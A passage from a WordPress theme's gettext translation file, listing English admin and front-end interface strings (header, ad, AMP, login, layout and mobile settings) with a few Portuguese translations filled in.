50px." msgstr "" #: backend/panels/header-style.php:369 backend/panels/header-style.php:636 msgid "Input a max height value for the logo of this header. Default is 60." msgstr "" #: backend/panels/ads.php:201 backend/panels/ads.php:390 msgid "" "Input a max width value (in px) for your ad image, leave blank set full size." msgstr "" #: backend/panels/single-post.php:1133 msgid "Input a meta text for the sponsored posts." msgstr "" #: backend/panels/table-contents.php:126 msgid "" "Input a minimum value for total heading tags to show the table of contents " "box." msgstr "" #: backend/panels/newsletter.php:49 msgid "Input a newsletter shortcode." msgstr "" #: backend/single-metaboxes.php:581 msgid "Input a offer label (Call to action) for this product review." msgstr "" #: backend/panels/single-post.php:1276 msgid "Input a position (after x paragraphs) to display the related bõ." msgstr "" #: backend/panels/table-contents.php:142 msgid "" "Input a position (after x paragraphs) to display the table of contents box." msgstr "" #: backend/single-metaboxes.php:737 msgid "" "Input a position (after x paragraphs) to display the table of contents box. " "Leave blank to use the theme option setting, Set \"-1\" for displaying at " "the top." msgstr "" #: backend/panels/ads.php:429 backend/panels/amp.php:589 msgid "Input a position (after x paragraphs) to display your ads." msgstr "" #: backend/panels/header.php:589 msgid "Input a redirect URL when the user logged in." msgstr "" #: backend/panels/single-post.php:1267 msgid "Input a related shortcode you want to display." msgstr "" #: backend/single-metaboxes.php:173 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this page, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:950 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this post, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:627 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "blog page." msgstr "" #: backend/panels/blog-pages.php:61 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "category pages." msgstr "" #: backend/panels/blog-pages.php:1945 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "search page." msgstr "" #: backend/category-settings.php:65 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this category. Leave blank to use the above setting." msgstr "" #: backend/single-metaboxes.php:122 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. Leave this option blank to set as the above setting." msgstr "" #: backend/single-metaboxes.php:899 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. This setting requests to select \"Use Ruby Template\" in site " "header setting in order to work." msgstr "" #: backend/panels/header.php:60 msgid "Input a Ruby Template shortcode for displaying as the website header." msgstr "" #: backend/single-metaboxes.php:541 msgid "" "Input a short description to display before the review score, For example: " "Good, Bad..." msgstr "" #: backend/single-metaboxes.php:668 msgid "" "Input a starting view value for this post. Leave blank if you want to " "display real data." msgstr "" #: backend/single-metaboxes.php:199 msgid "" "Input a tagline for this post, It will display under the single post title." msgstr "" #: backend/panels/ads.php:470 msgid "" "Input a template shortcode or any other shortcode you would like to show in " "this section." msgstr "" #: backend/panels/adblock.php:27 msgid "Input a title for the adblock popup." msgstr "" #: backend/panels/reaction.php:32 msgid "" "Input a title for the reaction section. Leave blank to set it as the default." msgstr "" #: backend/single-metaboxes.php:497 msgid "Input a title for this review section." msgstr "" #: backend/panels/design.php:69 msgid "" "Input a value to limited numbers of entry category show on all post listing " "layout, useful in case you have many categories per post." msgstr "" #: backend/mega-menu.php:205 msgid "" "Input a width value (in px) for this mega section. Leave blank or 0 to set " "to full width." msgstr "" #: backend/panels/header.php:142 msgid "" "Input a width value (in px) for this section. Leave blank to set a the " "default." msgstr "" #: backend/single-metaboxes.php:547 msgid "Input advantages for this review." msgstr "" #: backend/mega-menu.php:243 msgid "Input attachment image/SVG url to show your icon." msgstr "" #: backend/single-metaboxes.php:259 msgid "Input attribution for the featured image." msgstr "" #: backend/single-metaboxes.php:252 msgid "Input caption text for the featured image." msgstr "" #: backend/panels/header-style.php:629 msgid "" "Input custom height value (px) for the navigation bar of this header. " "Default is 40px." msgstr "" #: backend/panels/header-style.php:362 msgid "Input custom height value (px) for the navigation bar. Default is 40." msgstr "" #: backend/panels/header-style.php:81 msgid "Input custom height value (px) for this header. Default is 60." msgstr "" #: backend/category-settings.php:337 backend/panels/blog-pages.php:359 #: backend/panels/blog-pages.php:846 backend/panels/blog-pages.php:1260 #: backend/panels/blog-pages.php:1668 backend/panels/blog-pages.php:2160 #: backend/panels/bookmark.php:259 backend/panels/bookmark.php:707 msgid "" "Input custom ratio percent (height*100/width) for featured image you would " "like. For example: 50" msgstr "" #: backend/panels/general.php:35 msgid "" "Input default placeholder text for the search form, leave blank to set it as " "the default." msgstr "" #: backend/panels/newsletter.php:42 msgid "Input description for the popup newsletter form" msgstr "" #: backend/panels/bookmark.php:112 backend/panels/bookmark.php:455 msgid "Input description for this section." msgstr "" #: backend/single-metaboxes.php:561 msgid "Input disadvantages for this review." msgstr "" #: backend/category-settings.php:488 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:513 backend/panels/blog-pages.php:1000 #: backend/panels/blog-pages.php:1414 backend/panels/blog-pages.php:1822 #: backend/panels/blog-pages.php:2314 backend/panels/bookmark.php:860 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:480 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:505 backend/panels/blog-pages.php:992 #: backend/panels/blog-pages.php:1406 backend/panels/blog-pages.php:1814 #: backend/panels/blog-pages.php:2306 backend/panels/bookmark.php:852 #: backend/panels/single-post.php:609 backend/panels/single-post.php:618 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:359 msgid "" "Input entry meta tags to show. Separated by commas (for example: author,date)" ". All meta keys include: [author, date, category, tag, view, comment, update," " read, custom]" msgstr "" #: backend/single-metaboxes.php:575 msgid "Input final summary for this review." msgstr "" #: backend/panels/typography.php:587 msgid "Input Font Settings" msgstr "" #: backend/single-metaboxes.php:757 msgid "Input Heading" msgstr "" #: backend/single-metaboxes.php:206 msgid "" "Input highlights for this post. This section will appear a the top of " "content. To edit this section heading, Navigate to Theme Options > Single " "Post > Tagline & highlights" msgstr "" #: backend/single-metaboxes.php:393 msgid "Input iframe embed code if WordPress cannot support your audio URL." msgstr "" #: backend/single-metaboxes.php:345 msgid "Input iframe embed code if WordPress cannot support your video URL." msgstr "" #: backend/panels/bookmark.php:72 msgid "" "Input max expiration (days) to save bookmarks for the guest users. Set 0 for " "no expiration." msgstr "" #: backend/panels/design.php:166 msgid "" "Input number of words per minute to calculate the reading time. Default is " "130" msgstr "" #: backend/single-metaboxes.php:599 msgid "Input the currency of the price." msgstr "" #: backend/panels/amp.php:313 backend/panels/amp.php:373 #: backend/panels/amp.php:433 backend/panels/amp.php:494 #: backend/panels/amp.php:554 msgid "Input the data-ad-client number ID (without ca-pub-)." msgstr "" #: backend/panels/amp.php:321 backend/panels/amp.php:381 #: backend/panels/amp.php:441 backend/panels/amp.php:502 #: backend/panels/amp.php:562 msgid "Input the data-ad-slot number ID." msgstr "" #: backend/single-metaboxes.php:587 msgid "Input the destination URL of the offer." msgstr "" #: backend/panels/bookmark.php:478 msgid "Input the follow page URL for user can redirect to add their interests." msgstr "" #: backend/panels/header.php:157 backend/panels/header.php:389 msgid "" "Input the footer copyright text to display at the bottom of this section, " "allow raw HTML." msgstr "" #: backend/single-metaboxes.php:751 msgid "" "Input the heading for each page corresponding to the page break tags. Please " "input all headings for pages to show the section." msgstr "" #: backend/panels/table-contents.php:133 msgid "Input the heading for the table of contents box." msgstr "" #: backend/panels/design.php:238 msgid "Input the label for this meta." msgstr "" #: backend/panels/socials.php:190 backend/panels/socials.php:217 #: backend/panels/socials.php:244 msgid "Input the name of font icon, for example: \"fab fa-facebook\"." msgstr "" #: backend/panels/socials.php:184 backend/panels/socials.php:211 #: backend/panels/socials.php:238 msgid "Input the name of the social, for example: facebook, twitter." msgstr "" #: backend/single-metaboxes.php:772 msgid "" "Input the post source if it has, it will display at the bottom of post " "content" msgstr "" #: backend/single-metaboxes.php:793 msgid "" "Input the post via if it has, it will display at the bottom of post content" msgstr "" #: backend/single-metaboxes.php:593 msgid "Input the price of the offer." msgstr "" #: backend/panels/design.php:544 msgid "" "Input the read more label to display on your website. Default is \"Read " "More\"." msgstr "" #: backend/panels/bookmark.php:64 msgid "" "Input the redirect URL when user logged. Leave this option blank to set the " "default value." msgstr "" #: backend/single-metaboxes.php:630 msgid "Input the sponsor brand name for this post" msgstr "" #: backend/single-metaboxes.php:623 msgid "Input the sponsor website URL." msgstr "" #: backend/panels/newsletter.php:35 msgid "Input title for the popup newsletter form" msgstr "" #: backend/single-metaboxes.php:290 msgid "" "Input value or text for the custom meta that you created in Theme Options " "panel." msgstr "" #: backend/panels/single-post.php:349 msgid "Input your a description for your newsletter." msgstr "" #: backend/panels/single-post.php:342 msgid "Input your a heading for your newsletter section." msgstr "" #: backend/panels/single-post.php:356 msgid "" "Input your a newsletter (subscribe) shortcode or script to show at bottom " "entry content." msgstr "" #: backend/panels/ads.php:194 backend/panels/ads.php:383 msgid "Input your ad destination URL." msgstr "" #: backend/panels/ads.php:123 msgid "Input your ad script code." msgstr "" #: backend/panels/header.php:667 msgid "Input your alert content to show." msgstr "" #: backend/panels/header.php:674 msgid "Input your alert URL." msgstr "" #: backend/panels/amp.php:262 msgid "Input your amp auto ads code." msgstr "" #: backend/panels/amp.php:341 backend/panels/amp.php:401 #: backend/panels/amp.php:461 backend/panels/amp.php:522 #: backend/panels/amp.php:582 msgid "Input your AMP custom ad script." msgstr "" #: backend/single-metaboxes.php:387 msgid "" "Input your audio URL, support: SoundCloud, MixCloud. Do not forget to check " "\"Audio\" in Post Format section." msgstr "" #: backend/panels/ads.php:50 msgid "Input your auto ads code." msgstr "" #: backend/panels/optimized.php:203 msgid "input your company city and country address." msgstr "" #: backend/panels/optimized.php:217 msgid "input your company local postal code." msgstr "" #: backend/panels/optimized.php:196 msgid "input your company main email." msgstr "" #: backend/panels/optimized.php:189 msgid "input your company phone number." msgstr "" #: backend/panels/optimized.php:210 msgid "input your company street address." msgstr "" #: backend/panels/footer.php:192 msgid "input your copyright text or HTML." msgstr "" #: backend/panels/ads.php:312 msgid "Input your custom ad script code or Adsense." msgstr "" #: backend/panels/design.php:245 msgid "" "Input your custom CSS icon classname to display at the beginning of the meta." msgstr "" #: backend/panels/blog-pages.php:2412 msgid "" "Input your description for the 404 page. Leave this option blank to set it " "as the default." msgstr "" #: backend/panels/optimized.php:245 msgid "input your facebook app ID for OG tags." msgstr "" #: backend/panels/single-post.php:363 msgid "Input your policy text for the newsletter form, row HTML allowed." msgstr "" #: backend/panels/privacy.php:34 msgid "Input your privacy or cookie content for your website, allow raw HTML." msgstr "" #: backend/panels/socials.php:29 backend/panels/socials.php:36 #: backend/panels/socials.php:43 backend/panels/socials.php:50 #: backend/panels/socials.php:56 backend/panels/socials.php:63 #: backend/panels/socials.php:69 backend/panels/socials.php:75 #: backend/panels/socials.php:81 backend/panels/socials.php:87 #: backend/panels/socials.php:93 backend/panels/socials.php:99 #: backend/panels/socials.php:105 backend/panels/socials.php:111 #: backend/panels/socials.php:117 backend/panels/socials.php:123 #: backend/panels/socials.php:129 backend/panels/socials.php:135 #: backend/panels/socials.php:141 backend/panels/socials.php:147 #: backend/panels/socials.php:153 msgid "Input your social profile URL, Leave blank if you want to disable it." msgstr "" #: backend/panels/socials.php:178 backend/panels/socials.php:205 #: backend/panels/socials.php:232 msgid "Input your social profile URL." msgstr "" #: backend/panels/woocommerce.php:61 msgid "" "Input your template shortcode you would like to use Elementor builder to " "create a featured section at the top of shop page." msgstr "" #: backend/panels/footer.php:122 msgid "Input your template shortcode you would like to use Elementor builder." msgstr "" #: backend/single-metaboxes.php:332 msgid "Input your video link, support: Youtube, Vimeo, DailyMotion." msgstr "" #: backend/panels/typography.php:578 msgid "Inputs & Button" msgstr "" #: templates/parts.php:603 msgid "Instagram" msgstr "" #: backend/panels/socials.php:49 msgid "Instagram URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2811 msgid "Install" msgstr "" #: backend/class-tgm-plugin-activation.php:2697 #, php-format msgid "Install %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:340 backend/install-plugins.php:67 msgid "Install Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:339 backend/install-plugins.php:66 msgid "Install Required Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:2413 msgid "Installed But Not Activated" msgstr "" #: backend/class-tgm-plugin-activation.php:2584 msgid "Installed version:" msgstr "" #: backend/class-tgm-plugin-activation.php:3606 #, php-format msgid "Installing and Activating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:3614 #, php-format msgid "Installing Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:342 backend/install-plugins.php:68 #, php-format msgid "Installing Plugin: %s" msgstr "" #: backend/panels/logo.php:159 msgid "iOS Bookmarklet Icon" msgstr "" #: backend/single-metaboxes.php:276 msgid "" "It is useful in case this post has a lot of categories and you want to " "display only one in listings." msgstr "" #: templates/blog.php:19 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "" #: templates/page.php:124 msgid "" "It looks like nothing was found at this location. The page you were looking " "for does not exist or was loading incorrectly." msgstr "" #: templates/blog.php:501 msgid "" "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "" "Parece que não conseguimos encontrar o que você está procurando. Talvez " "pesquisar possa ajudar." #: backend/panels/footer.php:55 msgid "It will be helpful if you have not set up footer background." msgstr "" #: backend/single-metaboxes.php:552 backend/single-metaboxes.php:566 msgid "Item" msgstr "" #: backend/single-metaboxes.php:521 msgid "Item Label" msgstr "" #: backend/panels/optimized.php:144 msgid "ItemList (Carousel) Markup" msgstr "" #: backend/panels/newsletter.php:36 msgid "Join Us!" msgstr "" #: backend/panels/reaction.php:53 msgid "Joy" msgstr "" #: includes/fallbacks.php:167 msgid "k" msgstr "" #: backend/configs.php:857 msgid "Large Leaderboard (970x90)" msgstr "" #: backend/configs.php:853 msgid "Large Rectangle (336x280)" msgstr "" #: backend/panels/single-post.php:632 backend/panels/single-post.php:638 msgid "Last Updated Date" msgstr "" #: includes/menu.php:325 templates/header/templates.php:727 msgid "Latest News" msgstr "" #: backend/category-settings.php:177 backend/panels/blog-pages.php:195 msgid "Latest Posts - Heading" msgstr "" #: backend/category-settings.php:233 backend/panels/blog-pages.php:244 msgid "Latest Posts - Layout" msgstr "" #: backend/category-settings.php:213 backend/panels/blog-pages.php:541 msgid "Latest Posts - Pagination" msgstr "" #: backend/category-settings.php:290 backend/panels/blog-pages.php:298 msgid "Latest Posts - Sidebar" msgstr "" #: backend/panels/bookmark.php:589 msgid "Layout" msgstr "" #: backend/panels/table-contents.php:110 backend/single-metaboxes.php:722 msgid "layout" msgstr "" #: backend/configs.php:107 backend/configs.php:638 backend/configs.php:697 #: backend/configs.php:736 backend/configs.php:775 msgid "Layout 1" msgstr "" #: backend/configs.php:120 msgid "Layout 1 - Center" msgstr "" #: backend/configs.php:116 msgid "Layout 10" msgstr "" #: backend/configs.php:129 msgid "Layout 10 - Center" msgstr "" #: backend/configs.php:117 msgid "Layout 11" msgstr "" #: backend/configs.php:130 msgid "Layout 11 - Center" msgstr "" #: backend/configs.php:118 msgid "Layout 12" msgstr "" #: backend/configs.php:131 msgid "Layout 12 - Center" msgstr "" #: backend/configs.php:119 msgid "Layout 13" msgstr "" #: backend/configs.php:132 msgid "Layout 13 - Center" msgstr "" #: backend/configs.php:108 backend/configs.php:642 backend/configs.php:701 #: backend/configs.php:740 backend/configs.php:779 msgid "Layout 2" msgstr "" #: backend/configs.php:121 msgid "Layout 2 - Center" msgstr "" #: backend/configs.php:109 backend/configs.php:646 backend/configs.php:705 #: backend/configs.php:744 backend/configs.php:783 msgid "Layout 3" msgstr "" #: backend/configs.php:122 msgid "Layout 3 - Center" msgstr "" #: backend/configs.php:110 backend/configs.php:650 backend/configs.php:709 #: backend/configs.php:748 msgid "Layout 4" msgstr "" #: backend/configs.php:123 msgid "Layout 4 - Center" msgstr "" #: backend/configs.php:111 backend/configs.php:654 msgid "Layout 5" msgstr "" #: backend/configs.php:124 msgid "Layout 5 - Center" msgstr "" #: backend/configs.php:112 backend/configs.php:658 msgid "Layout 6" msgstr "" #: backend/configs.php:125 msgid "Layout 6 - Center" msgstr "" #: backend/configs.php:113 backend/configs.php:662 msgid "Layout 7" msgstr "" #: backend/configs.php:126 msgid "Layout 7 - Center" msgstr "" #: backend/configs.php:114 backend/configs.php:666 msgid "Layout 8" msgstr "" #: backend/configs.php:127 msgid "Layout 8 - Center" msgstr "" #: backend/configs.php:115 msgid "Layout 9" msgstr "" #: backend/configs.php:128 msgid "Layout 9 - Center" msgstr "" #: backend/panels/login.php:20 backend/panels/table-contents.php:105 msgid "Layout Settings" msgstr "" #: backend/panels/single-post.php:28 msgid "Layouts" msgstr "" #: backend/panels/optimized.php:27 msgid "Lazy Load Featured Image" msgstr "" #: backend/configs.php:842 msgid "Leaderboard (728x90)" msgstr "" #: includes/actions.php:55 templates/single/review-comment.php:97 #: templates/single/templates.php:906 msgid "Leave a comment" msgstr "Deixe um comentário" #: templates/single/review-comment.php:50 msgid "Leave a reply" msgstr "" #: templates/single/review-comment.php:49 templates/single/templates.php:883 msgid "Leave a review" msgstr "" #: backend/panels/amp.php:287 msgid "Leave blank AMP auto ads if you would like to use the ad units." msgstr "" #: backend/panels/footer.php:115 backend/panels/footer.php:215 msgid "" "Leave blank if you use the \"Archive & Menu Widgets\" font size setting." msgstr "" #: backend/panels/blog-pages.php:694 msgid "" "Leave this option blank if you want to use standard blog layout settings." msgstr "" #: backend/panels/block-classic.php:92 backend/panels/block-grid.php:92 #: backend/panels/block-grid.php:257 backend/panels/block-grid.php:422 #: backend/panels/block-grid.php:595 backend/panels/block-grid.php:782 #: backend/panels/block-list.php:100 backend/panels/block-list.php:273 #: backend/panels/block-list.php:454 backend/panels/block-list.php:649 #: backend/panels/blog-pages.php:437 backend/panels/blog-pages.php:924 #: backend/panels/blog-pages.php:1338 backend/panels/blog-pages.php:1746 #: backend/panels/blog-pages.php:2238 backend/panels/bookmark.php:336 #: backend/panels/bookmark.php:784 msgid "Leave this option blank or set 0 to disable." msgstr "" #: backend/panels/login.php:59 msgid "Leave this option blank to redirect to the homepage." msgstr "" #: backend/panels/login.php:105 backend/panels/login.php:113 msgid "Leave this option blank to set the default value." msgstr "" #: backend/panels/ads.php:53 msgid "Leave this option blank to use unit ads code." msgstr "" #: backend/configs.php:175 backend/configs.php:544 backend/configs.php:823 msgid "Left" msgstr "" #: backend/configs.php:336 msgid "Left Dot" msgstr "" #: backend/panels/footer.php:46 msgid "Left Dotted Style" msgstr "" #: backend/panels/header.php:343 msgid "Left Logo" msgstr "" #: backend/panels/header.php:345 msgid "Left Logo 2" msgstr "" #: backend/mega-menu.php:156 backend/panels/footer.php:66 #: backend/panels/header-style.php:92 backend/panels/header-style.php:380 #: backend/panels/header-style.php:647 backend/panels/header.php:289 msgid "Light Text" msgstr "" #: backend/panels/design.php:574 msgid "Link Hover Effect" msgstr "" #: backend/panels/single-post.php:759 backend/panels/single-post.php:898 #: backend/panels/single-post.php:1036 backend/panels/single-post.php:1665 #: templates/parts.php:606 msgid "LinkedIn" msgstr "" #: backend/panels/socials.php:62 msgid "LinkedIn URL" msgstr "" #: backend/panels/block-list.php:27 backend/panels/block-list.php:200 msgid "list" msgstr "" #: backend/category-settings.php:249 msgid "List 1" msgstr "" #: backend/configs.php:471 backend/panels/block-list.php:17 msgid "List 1 (Standard)" msgstr "" #: backend/category-settings.php:250 backend/configs.php:475 #: backend/panels/block-list.php:190 msgid "List 2" msgstr "" #: templates/single/templates.php:1341 msgid "List of Images" msgstr "" #: backend/panels/header.php:215 msgid "Live Search Result" msgstr "" #: backend/panels/design.php:711 msgid "Load Font Awesome" msgstr "" #: backend/panels/design.php:712 msgid "" "Load font Awesome icons library to your website. This will help you can " "embed this font icons to your widgets and content." msgstr "" #: backend/panels/design.php:706 msgid "" "Load font Awesome icons library. Enabling this option may affect to the site " "performance." msgstr "" #: backend/configs.php:562 backend/panels/bookmark.php:574 msgid "Load More (Ajax)" msgstr "" #: backend/panels/optimized.php:202 msgid "Locality Address" msgstr "" #: backend/panels/login.php:36 msgid "Login Form Position" msgstr "" #: backend/panels/login.php:51 msgid "Login Logo" msgstr "" #: backend/panels/bookmark.php:63 backend/panels/header.php:588 #: backend/panels/login.php:103 msgid "Login Redirect URL" msgstr "" #: backend/panels/login.php:12 msgid "Login Screen" msgstr "" #: backend/panels/login.php:66 msgid "Login Screen Background" msgstr "" #: backend/panels/login.php:79 msgid "Login Screen Color" msgstr "" #: backend/panels/logo.php:16 msgid "Logo" msgstr "" #: backend/panels/login.php:57 msgid "Logo - Destination URL" msgstr "" #: backend/panels/amp.php:97 backend/panels/footer.php:158 msgid "Logo Height" msgstr "" #: backend/panels/header-style.php:368 backend/panels/header-style.php:635 msgid "Logo Max Height" msgstr "" #: backend/panels/header.php:618 backend/panels/login.php:111 msgid "Logout Redirect URL" msgstr "" #: templates/popup.php:208 msgid "Lost your password?" msgstr "Esqueceu sua senha?" #: backend/panels/reaction.php:42 msgid "Love" msgstr "" #: includes/fallbacks.php:165 msgid "M" msgstr "" #: backend/panels/logo.php:46 msgid "Main Logo" msgstr "" #: backend/panels/typography.php:902 functions.php:56 #: templates/header/templates.php:241 msgid "Main Menu" msgstr "" #: templates/header/templates.php:248 msgid "main menu" msgstr "" #: backend/panels/sidebar.php:48 msgid "Making sidebars permanently visible when scrolling up and down." msgstr "" #: backend/category-settings.php:312 msgid "Making this sidebar permanently visible when scrolling up and down." msgstr "" #: backend/mega-menu.php:288 includes/fallbacks.php:274 msgid "Manage Locations" msgstr "" #: backend/panels/page.php:42 backend/panels/single-post.php:182 #: backend/single-metaboxes.php:69 msgid "Max Width Content without Sidebar" msgstr "" #: backend/panels/design.php:68 msgid "Maximum Entry Categories" msgstr "" #: backend/configs.php:852 msgid "Medium Rectangle (300x250)" msgstr "" #: backend/mega-menu.php:124 backend/mega-menu.php:165 msgid "Mega Menu" msgstr "" #: backend/panels/header-style.php:88 backend/panels/header-style.php:376 #: backend/panels/header-style.php:643 msgid "Mega Menu - Text Color Scheme" msgstr "" #: backend/panels/typography.php:908 msgid "Menu Font" msgstr "" #: backend/panels/design.php:592 msgid "Menu Hover Effect" msgstr "" #: backend/mega-menu.php:234 msgid "Menu Icon" msgstr "" #: backend/single-metaboxes.php:540 msgid "Meta Description" msgstr "" #: backend/panels/design.php:244 msgid "Meta Icon ClassName" msgstr "" #: backend/panels/design.php:237 msgid "Meta Label" msgstr "" #: backend/panels/design.php:254 msgid "Meta Label Position" msgstr "" #: backend/panels/logo.php:167 msgid "Metro UI Bookmarklet Icon" msgstr "" #: backend/panels/header.php:729 msgid "Mini Cart" msgstr "" #: backend/class-tgm-plugin-activation.php:2592 msgid "Minimum required version:" msgstr "" #: backend/panels/color.php:118 msgid "Miscellaneous" msgstr "" #: backend/category-settings.php:487 backend/panels/block-classic.php:147 #: backend/panels/block-grid.php:147 backend/panels/block-grid.php:312 #: backend/panels/block-grid.php:477 backend/panels/block-grid.php:650 #: backend/panels/block-grid.php:837 backend/panels/block-list.php:155 #: backend/panels/block-list.php:328 backend/panels/block-list.php:509 #: backend/panels/block-list.php:704 backend/panels/blog-pages.php:512 #: backend/panels/blog-pages.php:999 backend/panels/blog-pages.php:1413 #: backend/panels/blog-pages.php:1821 backend/panels/blog-pages.php:2313 #: backend/panels/bookmark.php:859 backend/panels/single-post.php:608 #: backend/panels/single-post.php:617 msgid "Mobile - Hide Entry Meta" msgstr "" #: backend/category-settings.php:457 backend/panels/blog-pages.php:482 #: backend/panels/blog-pages.php:969 backend/panels/blog-pages.php:1383 #: backend/panels/blog-pages.php:1791 backend/panels/blog-pages.php:2283 #: backend/panels/bookmark.php:381 backend/panels/bookmark.php:829 msgid "Mobile - Title Font Size" msgstr "" #: backend/configs.php:859 msgid "Mobile Banner (320x100)" msgstr "" #: backend/configs.php:856 msgid "Mobile Banner (320x50)" msgstr "" #: backend/panels/typography.php:52 backend/panels/typography.php:98 #: backend/panels/typography.php:147 backend/panels/typography.php:196 #: backend/panels/typography.php:245 backend/panels/typography.php:294 #: backend/panels/typography.php:343 backend/panels/typography.php:392 #: backend/panels/typography.php:441 backend/panels/typography.php:507 #: backend/panels/typography.php:555 backend/panels/typography.php:610 #: backend/panels/typography.php:653 backend/panels/typography.php:729 #: backend/panels/typography.php:786 backend/panels/typography.php:870 #: backend/panels/typography.php:1056 backend/panels/typography.php:1128 msgid "Mobile Font Size" msgstr "" #: backend/configs.php:860 msgid "Mobile Friendly (300x100)" msgstr "" #: backend/panels/header.php:306 msgid "Mobile Header" msgstr "" #: backend/panels/header.php:746 msgid "Mobile Header - Mini Cart" msgstr "" #: backend/panels/header.php:237 msgid "Mobile Header - Search Icon" msgstr "" #: backend/panels/header.php:540 msgid "Mobile Header - Sign In" msgstr "" #: backend/panels/header.php:402 msgid "Mobile Header Colors" msgstr "" #: backend/panels/header.php:340 msgid "Mobile Header Layout" msgstr "" #: backend/panels/header.php:333 msgid "Mobile Header Style" msgstr "" #: backend/panels/logo.php:95 msgid "Mobile Logo" msgstr "" #: backend/panels/logo.php:85 msgid "Mobile Logos" msgstr "" #: backend/panels/typography.php:947 functions.php:57 #: templates/header/templates.php:609 msgid "Mobile Menu" msgstr "" #: backend/panels/typography.php:953 msgid "Mobile Menu Font" msgstr "" #: backend/panels/header.php:353 msgid "Mobile Navigation Height" msgstr "" #: backend/panels/typography.php:992 functions.php:58 msgid "Mobile Quick Access" msgstr "" #: backend/panels/typography.php:998 msgid "Mobile Quick Access Menu Font" msgstr "" #: backend/panels/color.php:102 msgid "Mode Switcher - Dark Icon Background" msgstr "" #: backend/panels/color.php:94 msgid "Mode Switcher - Light Icon Color" msgstr "" #: templates/header/templates.php:421 msgid "More" msgstr "" #: backend/panels/header.php:222 msgid "More Menu - Search Form" msgstr "" #: backend/panels/header-style.php:29 backend/panels/header-style.php:323 #: backend/panels/header-style.php:574 msgid "More Menu Button" msgstr "" #: backend/panels/header.php:112 msgid "More Menu Item" msgstr "" #: includes/sidebars.php:86 msgid "More Menu Section" msgstr "" #: backend/panels/header.php:208 msgid "More Menu Triggered" msgstr "" #: templates/ajax.php:186 msgid "More Results" msgstr "Mais resultados" #: templates/parts.php:621 msgid "Myspace" msgstr "" #: backend/panels/socials.php:92 msgid "Myspace URL" msgstr "" #: backend/panels/login.php:96 msgid "Navigate to \"Header > Popup Sign In\" to set for the popup login form." msgstr "" #: backend/panels/blog-pages.php:229 msgid "" "Navigate to \"Heading Design\" panel to edit font size for table and mobile " "device." msgstr "" #: backend/panels/heading.php:42 msgid "" "Navigate to \"Typography Settings > Block Heading\" to set the font values." msgstr "" #: backend/panels/footer.php:201 msgid "" "Navigate to Typography > Archive & Menu Widgets > Footer Menus to set the " "font values." msgstr "" #: backend/panels/header-style.php:112 backend/panels/header-style.php:400 #: backend/panels/header-style.php:480 backend/panels/header-style.php:667 #: backend/panels/header-style.php:746 msgid "Navigation Background" msgstr "" #: backend/panels/blog-pages.php:45 backend/panels/blog-pages.php:611 #: backend/panels/blog-pages.php:1929 backend/panels/header-style.php:68 #: backend/panels/header-style.php:345 backend/panels/header-style.php:613 #: backend/single-metaboxes.php:129 backend/single-metaboxes.php:906 msgid "Navigation Bar Style" msgstr "" #: backend/panels/header-style.php:51 backend/panels/header-style.php:596 msgid "Navigation Bar Style & Layout" msgstr "" #: backend/panels/header-style.php:106 backend/panels/header-style.php:394 #: backend/panels/header-style.php:661 msgid "Navigation Colors" msgstr "" #: backend/panels/header-style.php:361 backend/panels/header-style.php:628 msgid "Navigation Height" msgstr "" #: backend/mega-menu.php:210 msgid "Navigation Sub Label" msgstr "" #: templates/parts.php:395 msgid "Newer Articles" msgstr "" #: comments.php:26 msgid "Newer Comments →" msgstr "" #: templates/single/review-comment.php:37 msgid "Newer Reviews" msgstr "" #: backend/panels/single-post.php:348 msgid "Newsletter Description" msgstr "" #: templates/blocks/newsletter.php:42 templates/blocks/newsletter.php:44 #: templates/blocks/newsletter.php:47 templates/blocks/newsletter.php:106 #: templates/blocks/newsletter.php:108 templates/blocks/newsletter.php:111 msgid "newsletter featured" msgstr "" #: backend/panels/single-post.php:341 msgid "Newsletter Heading" msgstr "" #: backend/panels/newsletter.php:48 backend/panels/single-post.php:355 msgid "Newsletter Shortcode" msgstr "" #: templates/parts.php:349 msgid "Next" msgstr "" #: templates/single/templates.php:1029 msgid "Next Article" msgstr "" #: templates/single/templates.php:580 msgid "Next Page" msgstr "" #: backend/panels/single-post.php:1372 msgid "Next Prev" msgstr "" #: backend/panels/single-post.php:401 msgid "Next/Prev - Mobile Hide" msgstr "" #: backend/panels/amp.php:204 msgid "Next/Prev Articles" msgstr "" #: backend/panels/single-post.php:392 msgid "Next/Prev Post Pagination" msgstr "" #: backend/class-tgm-plugin-activation.php:402 #, php-format msgid "No action taken. Plugin %1$s was already active." msgstr "" #: backend/panels/design.php:677 msgid "No Border" msgstr "" #: backend/configs.php:670 msgid "No Featured" msgstr "" #: templates/parts.php:114 msgid "" "No found 